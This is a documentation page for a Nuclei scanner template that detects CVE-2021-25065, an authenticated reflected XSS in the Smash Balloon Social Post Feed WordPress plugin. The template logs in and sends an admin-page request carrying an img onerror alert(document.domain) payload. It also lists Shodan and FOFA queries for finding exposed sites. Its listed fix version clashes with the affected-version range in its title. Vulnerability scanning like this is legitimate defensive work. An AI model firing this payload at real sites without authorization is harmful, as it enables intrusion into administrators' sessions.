Skip to content
Nuclei Templates

Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting

ID: CVE-2021-25065

Severity: medium

Author: Harsh

Tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon

Description

Section titled “Description”

The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.

YAML Source

Section titled “YAML Source”
id: CVE-2021-25065


info:
  name: Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
  impact: |
    An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 2.19.2
  reference:
    - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc
    - https://wordpress.org/plugins/custom-facebook-feed/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-25065
    cwe-id: CWE-79
    epss-score: 0.00069
    epss-percentile: 0.29862
    cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: smashballoon
    product: smash_balloon_social_post_feed
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/
    fofa-query: body=/wp-content/plugins/custom-facebook-feed/
    publicwww-query: "/wp-content/plugins/custom-facebook-feed/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<img src onerror=alert(document.domain)>")'
          - 'contains(body_2, "custom-facebook-feed")'
        condition: and
# digest: 4a0a00473045022100afea8694fa0b865d42775b3cb2e2bf2df019ce9a5b2954bd790daf75ee04c3e602204a3e1a6d2205c6931bc9443a0111d442c8699550143876615f14dd12e004c07f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25065.yaml"

View on Github